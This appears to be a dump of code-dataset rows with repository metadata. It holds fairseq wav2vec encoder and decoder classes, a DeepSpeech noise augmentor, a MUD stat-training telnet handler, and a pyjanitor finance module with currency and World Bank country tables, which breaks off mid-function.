class Wav2VecEncoder(FairseqEncoder):
def __init__(self, cfg: Wav2Vec2AsrConfig, tgt_dict=None):
self.apply_mask = cfg.apply_mask
arg_overrides = {
"dropout": cfg.dropout,
"activation_dropout": cfg.activation_dropout,
"dropout_input": cfg.dropout_input,
"attention_dropout": cfg.attention_dropout,
"mask_length": cfg.mask_length,
"mask_prob": cfg.mask_prob,
"mask_selection": cfg.mask_selection,
"mask_other": cfg.mask_other,
"no_mask_overlap": cfg.no_mask_overlap,
"mask_channel_length": cfg.mask_channel_length,
"mask_channel_prob": cfg.mask_channel_prob,
"mask_channel_selection": cfg.mask_channel_selection,
"mask_channel_other": cfg.mask_channel_other,
"no_mask_channel_overlap": cfg.no_mask_channel_overlap,
"encoder_layerdrop": cfg.layerdrop,
"feature_grad_mult": cfg.feature_grad_mult,
}
if cfg.w2v_args is None:
state = checkpoint_utils.load_checkpoint_to_cpu(cfg.w2v_path, arg_overrides)
w2v_args = state.get("cfg", None)
if w2v_args is None:
w2v_args = convert_namespace_to_omegaconf(state["args"])
cfg.w2v_args = w2v_args
else:
state = None
w2v_args = cfg.w2v_args
if isinstance(w2v_args, Namespace):
cfg.w2v_args = w2v_args = convert_namespace_to_omegaconf(w2v_args)
assert cfg.normalize == w2v_args.task.normalize, (
"Fine-tuning works best when data normalization is the same. "
"Please check that --normalize is set or unset for both pre-training and here"
)
w2v_args.task.data = cfg.data
task = tasks.setup_task(w2v_args.task)
model = task.build_model(w2v_args.model)
if state is not None and not cfg.no_pretrained_weights:
model.load_state_dict(state["model"], strict=True)
model.remove_pretraining_modules()
super().__init__(task.source_dictionary)
d = w2v_args.model.encoder_embed_dim
self.w2v_model = model
self.final_dropout = nn.Dropout(cfg.final_dropout)
self.freeze_finetune_updates = cfg.freeze_finetune_updates
self.num_updates = 0
if tgt_dict is not None:
self.proj = Linear(d, len(tgt_dict))
elif getattr(cfg, "decoder_embed_dim", d) != d:
self.proj = Linear(d, cfg.decoder_embed_dim)
else:
self.proj = None
def set_num_updates(self, num_updates):
super().set_num_updates(num_updates)
self.num_updates = num_updates
def forward(self, source, padding_mask, tbc=True, **kwargs):
w2v_args = {
"source": source,
"padding_mask": padding_mask,
"mask": self.apply_mask and self.training,
}
ft = self.freeze_finetune_updates <= self.num_updates
with torch.no_grad() if not ft else contextlib.ExitStack():
x, padding_mask = self.w2v_model.extract_features(**w2v_args)
if tbc:
x = x.transpose(0, 1)
x = self.final_dropout(x)
if self.proj:
x = self.proj(x)
return {
"encoder_out": x,
"encoder_padding_mask": padding_mask,
"padding_mask": padding_mask,
}
def reorder_encoder_out(self, encoder_out, new_order):
if encoder_out["encoder_out"] is not None:
encoder_out["encoder_out"] = encoder_out["encoder_out"].index_select(
1, new_order
)
if encoder_out["encoder_padding_mask"] is not None:
encoder_out["encoder_padding_mask"] = encoder_out[
"encoder_padding_mask"
].index_select(0, new_order)
return encoder_out
def max_positions(self):
return None
def upgrade_state_dict_named(self, state_dict, name):
return state_dict
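# A minimal, hedged illustration of the conditional no-grad idiom used in
# Wav2VecEncoder.forward above: until freeze_finetune_updates has passed, the
# wav2vec model runs under torch.no_grad(); afterwards the contextlib.ExitStack()
# branch is a no-op and gradients flow. The function name and arguments below
# are illustrative only.
import contextlib
import torch

def frozen_or_trainable_forward(module, x, num_updates, freeze_updates):
    ft = freeze_updates <= num_updates
    # ExitStack() does nothing here, so this context either disables autograd
    # (frozen phase) or leaves it untouched (fine-tuning phase)
    with torch.no_grad() if not ft else contextlib.ExitStack():
        return module(x)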
class TransformerDecoder(FairseqIncrementalDecoder):
def __init__(
self,
cfg: Wav2Vec2Seq2SeqConfig,
dictionary,
embed_tokens,
no_encoder_attn=False,
):
super().__init__(dictionary)
self.dropout = cfg.decoder_dropout
self.share_input_output_embed = cfg.share_decoder_input_output_embed
input_embed_dim = embed_tokens.embedding_dim
embed_dim = cfg.decoder_embed_dim
self.output_embed_dim = cfg.decoder_embed_dim
self.layerdrop = cfg.decoder_layerdrop
padding_idx = embed_tokens.padding_idx
self.max_target_positions = cfg.max_target_positions
self.embed_tokens = embed_tokens
self.embed_scale = math.sqrt(embed_dim)
self.project_in_dim = (
Linear(input_embed_dim, embed_dim, bias=False)
if embed_dim != input_embed_dim
else None
)
self.embed_positions = (
PositionalEmbedding(
cfg.max_target_positions,
embed_dim,
padding_idx,
learned=cfg.decoder_learned_pos,
)
if not cfg.no_token_positional_embeddings
else None
)
transformer_cfg = copy.deepcopy(cfg)
with open_dict(transformer_cfg):
transformer_cfg.dropout = transformer_cfg.decoder_dropout
transformer_cfg.attention_dropout = (
transformer_cfg.decoder_attention_dropout
)
transformer_cfg.activation_dropout = (
transformer_cfg.decoder_activation_dropout
)
self.layers = nn.ModuleList([])
self.layers.extend(
[
TransformerDecoderLayer(transformer_cfg, no_encoder_attn)
for _ in range(transformer_cfg.decoder_layers)
]
)
if not self.share_input_output_embed:
self.embed_out = nn.Parameter(
torch.Tensor(len(dictionary), self.output_embed_dim)
)
nn.init.normal_(self.embed_out, mean=0, std=self.output_embed_dim ** -0.5)
if transformer_cfg.decoder_normalize_before:
self.layer_norm = LayerNorm(embed_dim)
else:
self.layer_norm = None
def forward(
self, prev_output_tokens, encoder_out=None, incremental_state=None, **unused
):
prev_output_tokens = prev_output_tokens.long()
x, extra = self.extract_features(
prev_output_tokens, encoder_out, incremental_state
)
x = self.output_layer(x)
return x, extra
def extract_features(
self, prev_output_tokens, encoder_out=None, incremental_state=None, **unused
):
positions = (
self.embed_positions(
prev_output_tokens, incremental_state=incremental_state
)
if self.embed_positions is not None
else None
)
if incremental_state is not None:
prev_output_tokens = prev_output_tokens[:, -1:]
if positions is not None:
positions = positions[:, -1:]
x = self.embed_scale * self.embed_tokens(prev_output_tokens)
if self.project_in_dim is not None:
x = self.project_in_dim(x)
if positions is not None:
x += positions
x = F.dropout(x, p=self.dropout, training=self.training)
x = x.transpose(0, 1)
attn = None
inner_states = [x]
for layer in self.layers:
dropout_probability = np.random.random()
if not self.training or (dropout_probability > self.layerdrop):
x, attn, _ = layer(
x,
encoder_out["encoder_out"] if encoder_out is not None else None,
encoder_out["encoder_padding_mask"]
if encoder_out is not None
else None,
incremental_state,
self_attn_mask=self.buffered_future_mask(x)
if incremental_state is None
else None,
)
inner_states.append(x)
if self.layer_norm:
x = self.layer_norm(x)
x = x.transpose(0, 1)
return x, {"attn": attn, "inner_states": inner_states}
def output_layer(self, features, **kwargs):
if self.share_input_output_embed:
return F.linear(features, self.embed_tokens.weight)
else:
return F.linear(features, self.embed_out)
def max_positions(self):
if self.embed_positions is None:
return self.max_target_positions
return min(self.max_target_positions, self.embed_positions.max_positions)
def buffered_future_mask(self, tensor):
dim = tensor.size(0)
if (
not hasattr(self, "_future_mask")
or self._future_mask is None
or self._future_mask.device != tensor.device
or self._future_mask.size(0) < dim
):
self._future_mask = torch.triu(
utils.fill_with_neg_inf(tensor.new(dim, dim)), 1
)
return self._future_mask[:dim, :dim]
def upgrade_state_dict_named(self, state_dict, name):
return state_dict
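# A small demonstration of the causal mask produced by buffered_future_mask
# above: -inf strictly above the diagonal and 0 elsewhere, so that when added
# to the attention scores, position i cannot attend to positions j > i.
# The helper name is illustrative only.
import torch

def causal_mask_example(dim: int) -> torch.Tensor:
    return torch.triu(torch.full((dim, dim), float("-inf")), diagonal=1)

# causal_mask_example(3) ->
# tensor([[0., -inf, -inf],
#         [0.,   0., -inf],
#         [0.,   0.,   0.]])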
def Embedding(num_embeddings, embedding_dim, padding_idx):
m = nn.Embedding(num_embeddings, embedding_dim, padding_idx=padding_idx)
nn.init.normal_(m.weight, mean=0, std=embedding_dim ** -0.5)
nn.init.constant_(m.weight[padding_idx], 0)
return m
def Linear(in_features, out_features, bias=True):
m = nn.Linear(in_features, out_features, bias)
nn.init.xavier_uniform_(m.weight)
if bias:
nn.init.constant_(m.bias, 0.0)
return m
| true
| true
|
790b0c39682933c1feb2c6fab90ea0c2e8d189c6
| 2,733
|
py
|
Python
|
deepspeech/frontend/augmentor/noise_perturb.py
|
zh794390558/DeepSpeech
|
34178893327ad359cb816e55d7c66a10244fa08a
|
[
"Apache-2.0"
] | null | null | null |
deepspeech/frontend/augmentor/noise_perturb.py
|
zh794390558/DeepSpeech
|
34178893327ad359cb816e55d7c66a10244fa08a
|
[
"Apache-2.0"
] | null | null | null |
deepspeech/frontend/augmentor/noise_perturb.py
|
zh794390558/DeepSpeech
|
34178893327ad359cb816e55d7c66a10244fa08a
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains the noise perturb augmentation model."""
from deepspeech.frontend.audio import AudioSegment
from deepspeech.frontend.augmentor.base import AugmentorBase
from deepspeech.frontend.utility import read_manifest
class NoisePerturbAugmentor(AugmentorBase):
"""Augmentation model for adding background noise.
:param rng: Random generator object.
:type rng: random.Random
:param min_snr_dB: Minimal signal noise ratio, in decibels.
:type min_snr_dB: float
:param max_snr_dB: Maximal signal noise ratio, in decibels.
:type max_snr_dB: float
:param noise_manifest_path: Manifest path for noise audio data.
:type noise_manifest_path: str
"""
def __init__(self, rng, min_snr_dB, max_snr_dB, noise_manifest_path):
self._min_snr_dB = min_snr_dB
self._max_snr_dB = max_snr_dB
self._rng = rng
self._noise_manifest = read_manifest(manifest_path=noise_manifest_path)
def __call__(self, x, uttid=None, train=True):
if not train:
return x
self.transform_audio(x)
return x
def transform_audio(self, audio_segment):
"""Add background noise audio.
Note that this is an in-place transformation.
:param audio_segment: Audio segment to add effects to.
        :type audio_segment: AudioSegment|SpeechSegment
"""
noise_json = self._rng.choice(self._noise_manifest, 1, replace=False)[0]
if noise_json['duration'] < audio_segment.duration:
raise RuntimeError("The duration of sampled noise audio is smaller "
"than the audio segment to add effects to.")
diff_duration = noise_json['duration'] - audio_segment.duration
start = self._rng.uniform(0, diff_duration)
end = start + audio_segment.duration
noise_segment = AudioSegment.slice_from_file(
noise_json['audio_filepath'], start=start, end=end)
snr_dB = self._rng.uniform(self._min_snr_dB, self._max_snr_dB)
audio_segment.add_noise(
noise_segment, snr_dB, allow_downsampling=True, rng=self._rng)
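# A hedged, self-contained sketch of the SNR-based mixing that add_noise
# performs (this is not DeepSpeech's implementation; it only illustrates the
# arithmetic): the noise is rescaled so that
# 10 * log10(P_signal / P_noise_scaled) == snr_dB.
import numpy as np

def mix_at_snr(signal: np.ndarray, noise: np.ndarray, snr_dB: float) -> np.ndarray:
    p_signal = float(np.mean(signal ** 2))
    p_noise = float(np.mean(noise ** 2)) + 1e-12
    target_noise_power = p_signal / (10.0 ** (snr_dB / 10.0))
    scale = np.sqrt(target_noise_power / p_noise)
    # assumes the noise clip is at least as long as the signal, as enforced
    # by transform_audio above
    return signal + scale * noise[: len(signal)]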
| 42.046154
| 80
| 0.71094
|
from deepspeech.frontend.audio import AudioSegment
from deepspeech.frontend.augmentor.base import AugmentorBase
from deepspeech.frontend.utility import read_manifest
class NoisePerturbAugmentor(AugmentorBase):
def __init__(self, rng, min_snr_dB, max_snr_dB, noise_manifest_path):
self._min_snr_dB = min_snr_dB
self._max_snr_dB = max_snr_dB
self._rng = rng
self._noise_manifest = read_manifest(manifest_path=noise_manifest_path)
def __call__(self, x, uttid=None, train=True):
if not train:
return x
self.transform_audio(x)
return x
def transform_audio(self, audio_segment):
noise_json = self._rng.choice(self._noise_manifest, 1, replace=False)[0]
if noise_json['duration'] < audio_segment.duration:
raise RuntimeError("The duration of sampled noise audio is smaller "
"than the audio segment to add effects to.")
diff_duration = noise_json['duration'] - audio_segment.duration
start = self._rng.uniform(0, diff_duration)
end = start + audio_segment.duration
noise_segment = AudioSegment.slice_from_file(
noise_json['audio_filepath'], start=start, end=end)
snr_dB = self._rng.uniform(self._min_snr_dB, self._max_snr_dB)
audio_segment.add_noise(
noise_segment, snr_dB, allow_downsampling=True, rng=self._rng)
| true
| true
|
790b0c51e0ac839b5fdaf84458d325b4adaeab5a
| 3,221
|
py
|
Python
|
src/training_handler.py
|
tobynance/simple_mud
|
c9be32327fcab0c9bd37fabedb7dd566709b7d48
|
[
"MIT"
] | 6
|
2015-04-24T13:09:37.000Z
|
2022-01-27T01:12:47.000Z
|
src/training_handler.py
|
tobynance/simple_mud
|
c9be32327fcab0c9bd37fabedb7dd566709b7d48
|
[
"MIT"
] | 15
|
2015-03-09T00:07:55.000Z
|
2015-03-10T02:30:23.000Z
|
src/training_handler.py
|
tobynance/simple_mud
|
c9be32327fcab0c9bd37fabedb7dd566709b7d48
|
[
"MIT"
] | 2
|
2015-04-24T13:09:38.000Z
|
2020-12-22T08:40:07.000Z
|
import logging
import player
import telnet
logger = logging.getLogger(__name__)
########################################################################
class TrainingHandler(telnet.MudTelnetHandler):
####################################################################
def __init__(self, protocol, player):
super(TrainingHandler, self).__init__(protocol)
self.player = player
####################################################################
def handle(self, data):
if data == "quit":
player.player_database.save()
self.protocol.remove_handler()
return
if data in ["1", "2", "3"]:
if self.player.stat_points > 0:
self.player.stat_points -= 1
if data == "1":
self.player.attributes.BASE_STRENGTH += 1
elif data == "2":
self.player.attributes.BASE_HEALTH += 1
else:
self.player.attributes.BASE_AGILITY += 1
self.print_stats(True)
else:
logger.warn("unknown command: %s", data)
self.send("<reset><clearscreen><red>Unknown Command '%s'<newline>" % data)
self.print_stats(False)
####################################################################
def enter(self):
self.player.active = False
if self.player.newbie:
self.send(("<magenta><bold>Welcome to SimpleMUD, %s!\r\n" +
"You must train your character with your desired stats,\r\n" +
"before you enter the realm.\r\n\r\n") % self.player.name)
self.player.newbie = False
self.print_stats(False)
####################################################################
def hung_up(self):
logger.warn("%s - hung up in %s", self.protocol.get_remote_address(), self.__class__.__name__)
player.player_database.logout(self.player.id)
####################################################################
def flooded(self):
logger.warn("%s - flooded in %s", self.protocol.get_remote_address(), self.__class__.__name__)
player.player_database.logout(self.player.id)
####################################################################
def print_stats(self, clear_screen=True):
message = []
if clear_screen:
message.append("<clearscreen>")
message += ["<white><bold>"]
message.append("---------------------- Your Stats ----------------------\r\n")
message.append("<dim>")
message.append("Player: %s\r\n" % self.player.name)
message.append("Stat Points Left: %s\r\n" % self.player.stat_points)
message.append("1) Strength: %s\r\n" % self.player.attributes.STRENGTH)
message.append("2) Health: %s\r\n" % self.player.attributes.HEALTH)
message.append("3) Agility: %s\r\n" % self.player.attributes.AGILITY)
message.append("<bold>")
message.append("--------------------------------------------------------\r\n")
message.append("Enter 1, 2, or 3 to add a stat point, or \"quit\" to go back: ")
self.send("".join(message))
| 43.527027
| 102
| 0.473455
|
import logging
import player
import telnet
logger = logging.getLogger(__name__)
| true
| true
|
790b0d93c0d982713add4a368d7b247ccff99111
| 21,921
|
py
|
Python
|
janitor/finance.py
|
thatlittleboy/pyjanitor
|
f7977e00d3d9bf49aebeaa62db2965a668c50c90
|
[
"MIT"
] | null | null | null |
janitor/finance.py
|
thatlittleboy/pyjanitor
|
f7977e00d3d9bf49aebeaa62db2965a668c50c90
|
[
"MIT"
] | null | null | null |
janitor/finance.py
|
thatlittleboy/pyjanitor
|
f7977e00d3d9bf49aebeaa62db2965a668c50c90
|
[
"MIT"
] | null | null | null |
"""
Finance-specific data cleaning functions.
"""
import json
from datetime import date
from functools import lru_cache
import pandas as pd
import pandas_flavor as pf
import requests
from janitor.errors import JanitorError
from .utils import check, deprecated_alias, is_connected
currency_set = {
"AUD",
"BGN",
"BRL",
"CAD",
"CHF",
"CNY",
"CZK",
"DKK",
"EUR",
"GBP",
"HKD",
"HRK",
"HUF",
"IDR",
"ILS",
"INR",
"ISK",
"JPY",
"KRW",
"MXN",
"MYR",
"NOK",
"NZD",
"PHP",
"PLN",
"RON",
"RUB",
"SEK",
"SGD",
"THB",
"TRY",
"USD",
"ZAR",
}
# Dictionary of recognized World Bank countries and their abbreviations
wb_country_dict = {
"Aruba": "ABW",
"Afghanistan": "AFG",
"Angola": "AGO",
"Albania": "ALB",
"Andorra": "AND",
"Arab World": "ARB",
"United Arab Emirates": "ARE",
"Argentina": "ARG",
"Armenia": "ARM",
"American Samoa": "ASM",
"Antigua and Barbuda": "ATG",
"Australia": "AUS",
"Austria": "AUT",
"Azerbaijan": "AZE",
"Burundi": "BDI",
"Belgium": "BEL",
"Benin": "BEN",
"Burkina Faso": "BFA",
"Bangladesh": "BGD",
"Bulgaria": "BGR",
"Bahrain": "BHR",
"Bahamas, The": "BHS",
"Bosnia and Herzegovina": "BIH",
"Belarus": "BLR",
"Belize": "BLZ",
"Bermuda": "BMU",
"Bolivia": "BOL",
"Brazil": "BRA",
"Barbados": "BRB",
"Brunei Darussalam": "BRN",
"Bhutan": "BTN",
"Botswana": "BWA",
"Central African Republic": "CAF",
"Canada": "CAN",
"Central Europe and the Baltics": "CEB",
"Switzerland": "CHE",
"Channel Islands": "CHI",
"Chile": "CHL",
"China": "CHN",
"Cote d'Ivoire": "CIV",
"Cameroon": "CMR",
"Congo, Dem. Rep.": "COD",
"Congo, Rep.": "COG",
"Colombia": "COL",
"Comoros": "COM",
"Cabo Verde": "CPV",
"Costa Rica": "CRI",
"Caribbean small states": "CSS",
"Cuba": "CUB",
"Curacao": "CUW",
"Cayman Islands": "CYM",
"Cyprus": "CYP",
"Czech Republic": "CZE",
"Germany": "DEU",
"Djibouti": "DJI",
"Dominica": "DMA",
"Denmark": "DNK",
"Dominican Republic": "DOM",
"Algeria": "DZA",
"East Asia & Pacific (excluding high income)": "EAP",
"Early-demographic dividend": "EAR",
"East Asia & Pacific": "EAS",
"Europe & Central Asia (excluding high income)": "ECA",
"Europe & Central Asia": "ECS",
"Ecuador": "ECU",
"Egypt, Arab Rep.": "EGY",
"Euro area": "EMU",
"Eritrea": "ERI",
"Spain": "ESP",
"Estonia": "EST",
"Ethiopia": "ETH",
"European Union": "EUU",
"Fragile and conflict affected situations": "FCS",
"Finland": "FIN",
"Fiji": "FJI",
"France": "FRA",
"Faroe Islands": "FRO",
"Micronesia, Fed. Sts.": "FSM",
"Gabon": "GAB",
"United Kingdom": "GBR",
"Georgia": "GEO",
"Ghana": "GHA",
"Gibraltar": "GIB",
"Guinea": "GIN",
"Gambia, The": "GMB",
"Guinea-Bissau": "GNB",
"Equatorial Guinea": "GNQ",
"Greece": "GRC",
"Grenada": "GRD",
"Greenland": "GRL",
"Guatemala": "GTM",
"Guam": "GUM",
"Guyana": "GUY",
"High income": "HIC",
"Hong Kong SAR, China": "HKG",
"Honduras": "HND",
"Heavily indebted poor countries (HIPC)": "HPC",
"Croatia": "HRV",
"Haiti": "HTI",
"Hungary": "HUN",
"IBRD only": "IBD",
"IDA & IBRD total": "IBT",
"IDA total": "IDA",
"IDA blend": "IDB",
"Indonesia": "IDN",
"IDA only": "IDX",
"Isle of Man": "IMN",
"India": "IND",
"Not classified": "INX",
"Ireland": "IRL",
"Iran, Islamic Rep.": "IRN",
"Iraq": "IRQ",
"Iceland": "ISL",
"Israel": "ISR",
"Italy": "ITA",
"Jamaica": "JAM",
"Jordan": "JOR",
"Japan": "JPN",
"Kazakhstan": "KAZ",
"Kenya": "KEN",
"Kyrgyz Republic": "KGZ",
"Cambodia": "KHM",
"Kiribati": "KIR",
"St. Kitts and Nevis": "KNA",
"Korea, Rep.": "KOR",
"Kuwait": "KWT",
"Latin America & Caribbean (excluding high income)": "LAC",
"Lao PDR": "LAO",
"Lebanon": "LBN",
"Liberia": "LBR",
"Libya": "LBY",
"St. Lucia": "LCA",
"Latin America & Caribbean": "LCN",
"Least developed countries: UN classification": "LDC",
"Low income": "LIC",
"Liechtenstein": "LIE",
"Sri Lanka": "LKA",
"Lower middle income": "LMC",
"Low & middle income": "LMY",
"Lesotho": "LSO",
"Late-demographic dividend": "LTE",
"Lithuania": "LTU",
"Luxembourg": "LUX",
"Latvia": "LVA",
"Macao SAR, China": "MAC",
"St. Martin (French part)": "MAF",
"Morocco": "MAR",
"Monaco": "MCO",
"Moldova": "MDA",
"Madagascar": "MDG",
"Maldives": "MDV",
"Middle East & North Africa": "MEA",
"Mexico": "MEX",
"Marshall Islands": "MHL",
"Middle income": "MIC",
"North Macedonia": "MKD",
"Mali": "MLI",
"Malta": "MLT",
"Myanmar": "MMR",
"Middle East & North Africa (excluding high income)": "MNA",
"Montenegro": "MNE",
"Mongolia": "MNG",
"Northern Mariana Islands": "MNP",
"Mozambique": "MOZ",
"Mauritania": "MRT",
"Mauritius": "MUS",
"Malawi": "MWI",
"Malaysia": "MYS",
"North America": "NAC",
"Namibia": "NAM",
"New Caledonia": "NCL",
"Niger": "NER",
"Nigeria": "NGA",
"Nicaragua": "NIC",
"Netherlands": "NLD",
"Norway": "NOR",
"Nepal": "NPL",
"Nauru": "NRU",
"New Zealand": "NZL",
"OECD members": "OED",
"Oman": "OMN",
"Other small states": "OSS",
"Pakistan": "PAK",
"Panama": "PAN",
"Peru": "PER",
"Philippines": "PHL",
"Palau": "PLW",
"Papua New Guinea": "PNG",
"Poland": "POL",
"Pre-demographic dividend": "PRE",
"Puerto Rico": "PRI",
"Korea, Dem. People's Rep.": "PRK",
"Portugal": "PRT",
"Paraguay": "PRY",
"West Bank and Gaza": "PSE",
"Pacific island small states": "PSS",
"Post-demographic dividend": "PST",
"French Polynesia": "PYF",
"Qatar": "QAT",
"Romania": "ROU",
"Russian Federation": "RUS",
"Rwanda": "RWA",
"South Asia": "SAS",
"Saudi Arabia": "SAU",
"Sudan": "SDN",
"Senegal": "SEN",
"Singapore": "SGP",
"Solomon Islands": "SLB",
"Sierra Leone": "SLE",
"El Salvador": "SLV",
"San Marino": "SMR",
"Somalia": "SOM",
"Serbia": "SRB",
"Sub-Saharan Africa (excluding high income)": "SSA",
"South Sudan": "SSD",
"Sub-Saharan Africa": "SSF",
"Small states": "SST",
"Sao Tome and Principe": "STP",
"Suriname": "SUR",
"Slovak Republic": "SVK",
"Slovenia": "SVN",
"Sweden": "SWE",
"Eswatini": "SWZ",
"Sint Maarten (Dutch part)": "SXM",
"Seychelles": "SYC",
"Syrian Arab Republic": "SYR",
"Turks and Caicos Islands": "TCA",
"Chad": "TCD",
"East Asia & Pacific (IDA & IBRD countries)": "TEA",
"Europe & Central Asia (IDA & IBRD countries)": "TEC",
"Togo": "TGO",
"Thailand": "THA",
"Tajikistan": "TJK",
"Turkmenistan": "TKM",
"Latin America & the Caribbean (IDA & IBRD countries)": "TLA",
"Timor-Leste": "TLS",
"Middle East & North Africa (IDA & IBRD countries)": "TMN",
"Tonga": "TON",
"South Asia (IDA & IBRD)": "TSA",
"Sub-Saharan Africa (IDA & IBRD countries)": "TSS",
"Trinidad and Tobago": "TTO",
"Tunisia": "TUN",
"Turkey": "TUR",
"Tuvalu": "TUV",
"Tanzania": "TZA",
"Uganda": "UGA",
"Ukraine": "UKR",
"Upper middle income": "UMC",
"Uruguay": "URY",
"United States": "USA",
"Uzbekistan": "UZB",
"St. Vincent and the Grenadines": "VCT",
"Venezuela, RB": "VEN",
"British Virgin Islands": "VGB",
"Virgin Islands (U.S.)": "VIR",
"Vietnam": "VNM",
"Vanuatu": "VUT",
"World": "WLD",
"Samoa": "WSM",
"Kosovo": "XKX",
"Yemen, Rep.": "YEM",
"South Africa": "ZAF",
"Zambia": "ZMB",
"Zimbabwe": "ZWE",
}
def _check_currency(currency: str):
"""Check that currency is in supported set."""
if currency not in currency_set:
raise ValueError(
f"currency {currency} not in supported currency set, "
f"{currency_set}"
)
def _check_wb_country(country: str):
"""Check that world bank country is in supported set."""
if (country not in wb_country_dict.keys()) & (
country not in wb_country_dict.values() # noqa: PD011
):
raise ValueError(
f"country {country} not in supported World Bank country dict, "
f"{wb_country_dict}"
)
def _check_wb_years(year: int):
"""Check that year is in world bank dataset years."""
if year < 1960:
raise ValueError("year value must be 1960 or later")
# @lru_cache(maxsize=32)
# def _convert_currency(
# api_key: str,
# from_currency: str = None,
# to_currency: str = None,
# historical_date: Optional[date] = None,
# ) -> float:
# """
# Currency conversion for Pandas DataFrame column.
# Helper function for `convert_currency` method.
# The API used is https://exchangeratesapi.io/.
# """
# url = "http://api.exchangeratesapi.io"
# if historical_date:
# check("historical_date", historical_date, [datetime, date])
# if isinstance(historical_date, datetime):
# if historical_date < datetime(1999, 1, 4):
# raise ValueError(
# "historical_date:datetime must be later than 1999-01-04!"
# )
# string_date = str(historical_date)[:10]
# else:
# if historical_date < date(1999, 1, 4):
# raise ValueError(
# "historical_date:date must be later than 1999-01-04!"
# )
# string_date = str(historical_date)
# url = url + "/%s" % string_date
# else:
# url = url + "/latest"
# _check_currency(from_currency)
# _check_currency(to_currency)
# payload = {
# # "base": from_currency,
# "symbols": to_currency,
# "access_key": api_key,
# }
# result = requests.get(url, params=payload)
# if result.status_code != 200:
# raise ConnectionError(
# "Exchange Rate API failed to receive a 200 "
# "response from the server. "
# "Please try again later."
# )
# currency_dict = json.loads(result.text)
# rate = currency_dict["rates"][to_currency]
# return rate
@pf.register_dataframe_method
@deprecated_alias(colname="column_name")
def convert_currency(
df: pd.DataFrame,
api_key: str,
column_name: str = None,
from_currency: str = None,
to_currency: str = None,
historical_date: date = None,
make_new_column: bool = False,
) -> pd.DataFrame:
"""Deprecated function."""
raise JanitorError(
"The `convert_currency` function has been temporarily disabled due to "
"exchangeratesapi.io disallowing free pinging of its API. "
"(Our tests started to fail due to this issue.) "
"There is no easy way around this problem "
"except to find a new API to call on."
"Please comment on issue #829 "
"(https://github.com/pyjanitor-devs/pyjanitor/issues/829) "
"if you know of an alternative API that we can call on, "
"otherwise the function will be removed in pyjanitor's 1.0 release."
)
# @pf.register_dataframe_method
# @deprecated_alias(colname="column_name")
# def convert_currency(
# df: pd.DataFrame,
# api_key: str,
# column_name: str = None,
# from_currency: str = None,
# to_currency: str = None,
# historical_date: date = None,
# make_new_column: bool = False,
# ) -> pd.DataFrame:
# """
# Converts a column from one currency to another, with an option to
# convert based on historical exchange values.
# On April 10 2021,
# we discovered that there was no more free API available.
# Thus, an API key is required to perform currency conversion.
# API keys should be set as an environment variable,
# for example, `EXCHANGE_RATE_API_KEY``,
# and then passed into the function
# by calling on `os.getenv("EXCHANGE_RATE_APIKEY")``.
# :param df: A pandas dataframe.
# :param api_key: exchangeratesapi.io API key.
# :param column_name: Name of the new column. Should be a string, in order
# for the column name to be compatible with the Feather binary
# format (this is a useful thing to have).
# :param from_currency: The base currency to convert from.
# May be any of: currency_set = {"AUD", "BGN", "BRL", "CAD", "CHF",
# "CNY", "CZK", "DKK", "EUR", "GBP", "HKD", "HRK", "HUF", "IDR",
# "ILS", "INR", "ISK", "JPY", "KRW", "MXN", "MYR", "NOK", "NZD",
# "PHP", "PLN", "RON", "RUB", "SEK", "SGD", "THB", "TRY", "USD",
# "ZAR"}
# :param to_currency: The target currency to convert to.
# May be any of: currency_set = {"AUD", "BGN", "BRL", "CAD", "CHF",
# "CNY", "CZK", "DKK", "EUR", "GBP", "HKD", "HRK", "HUF", "IDR",
# "ILS", "INR", "ISK", "JPY", "KRW", "MXN", "MYR", "NOK", "NZD",
# "PHP", "PLN", "RON", "RUB", "SEK", "SGD", "THB", "TRY", "USD",
# "ZAR"}
# :param historical_date: If supplied,
# get exchange rate on a certain date.
# If not supplied, get the latest exchange rate.
# The exchange rates go back to Jan. 4, 1999.
# :param make_new_column: Generates new column
# for converted currency if True,
# otherwise, converts currency in place.
# :returns: The dataframe with converted currency column.
# .. code-block:: python
# import pandas as pd
# import janitor
# from datetime import date
# data_dict = {
# "a": [1.23452345, 2.456234, 3.2346125] * 3,
# "Bell__Chart": [1/3, 2/7, 3/2] * 3,
# "decorated-elephant": [1/234, 2/13, 3/167] * 3,
# "animals": ["rabbit", "leopard", "lion"] * 3,
# "cities": ["Cambridge", "Shanghai", "Basel"] * 3,
# }
# example_dataframe = pd.DataFrame(data_dict)
# Example: Converting a column from one currency to another
# using rates from 01/01/2018.
# .. code-block:: python
# example_dataframe.convert_currency('a', from_currency='USD',
# to_currency='EUR', historical_date=date(2018,1,1))
# Output:
# .. code-block:: python
# a Bell__Chart decorated-elephant animals cities
# 0 1.029370 0.333333 0.004274 rabbit Cambridge
# 1 2.048056 0.285714 0.153846 leopard Shanghai
# 2 2.697084 1.500000 0.017964 lion Basel
# 3 1.029370 0.333333 0.004274 rabbit Cambridge
# 4 2.048056 0.285714 0.153846 leopard Shanghai
# 5 2.697084 1.500000 0.017964 lion Basel
# 6 1.029370 0.333333 0.004274 rabbit Cambridge
# 7 2.048056 0.285714 0.153846 leopard Shanghai
# 8 2.697084 1.500000 0.017964 lion Basel
# """
# rate = _convert_currency(
# api_key, from_currency, to_currency, historical_date
# )
# if make_new_column:
# # new_column_name = column_name + "_" + to_currency
# column_name = column_name + "_" + to_currency
# df = df.assign(column_name=df[column_name] * rate)
# return df
@lru_cache(maxsize=32)
def _inflate_currency(
country: str = None, currency_year: int = None, to_year: int = None
) -> float:
"""
Currency inflation for Pandas DataFrame column.
Helper function for `inflate_currency` method.
The API used is the World Bank Indicator API:
https://datahelpdesk.worldbank.org/knowledgebase/articles/889392-about-the-indicators-api-documentation
"""
# Check all inputs are correct data type
check("country", country, [str])
check("currency_year", currency_year, [int])
check("to_year", to_year, [int])
# Get WB country abbreviation
_check_wb_country(country)
if country in wb_country_dict.keys():
country = wb_country_dict[country]
else:
# `country` is already a correct abbreviation; do nothing
pass
_check_wb_years(currency_year)
_check_wb_years(to_year)
url = (
"https://api.worldbank.org/v2/country/"
